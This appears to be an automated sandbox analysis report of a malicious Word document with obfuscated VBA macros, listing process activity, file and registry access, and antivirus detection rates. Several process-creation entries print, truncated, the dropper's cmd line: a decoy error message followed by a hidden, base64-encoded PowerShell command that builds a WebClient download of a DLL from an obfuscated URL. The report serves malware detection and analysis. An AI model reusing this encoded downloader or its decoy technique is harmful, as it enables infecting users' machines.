Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....o......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....Xp..............................}..v.....p......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....w......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....Xx..............................}..v.....x......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B......K....................... .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B......{....................... .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v............0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X...............................}..v............0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................B.............................. .y.............................................................................................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X ..............................}..v..... ......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................R..j.... Fv.............................}..v.....'......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....X(..............................}..v.....(......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............R..j.... Fv.............................}..v....(.......0.{.....................t.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#..................j....................................}..v....`/......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../...............R..j.... Fv.............................}..v.....6......0.{.............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v..../..................j.....6..............................}..v....@7......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;...............R..j.... Fv.............................}..v.....<......0.{.....................r.......h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....;..................j....H=..............................}..v.....=......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G....... .......R..j.... Fv.............................}..v....XA......0.{..............Bv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....G..................j.....B..............................}..v.....B......0.{.............xCv.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................29.j.....(..............................}..v.....['.....0.{.............8.v.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................29.j.....(..............................}..v....H.'.....0.{.............8.v.............h...............	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: v22Pc0qA.doc.doc	Metadefender: Detection: 44%
Source: v22Pc0qA.doc.doc	ReversingLabs: Detection: 86%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: scorlib.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2114201086.0000000002B57000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2113923637.00000000028B0000.00000002.00000001.sdmp

Source: v22Pc0qA.doc.doc

Initial sample: OLE summary subject = extensible Automotive generate withdrawal Wooden Global architecture

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Source: v22Pc0qA.doc.doc	Stream path 'Macros/VBA/Lxvinhyq0hu0i' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Lxvinhyq0hu0i			Name: Lxvinhyq0hu0i

PowerShell case anomaly found

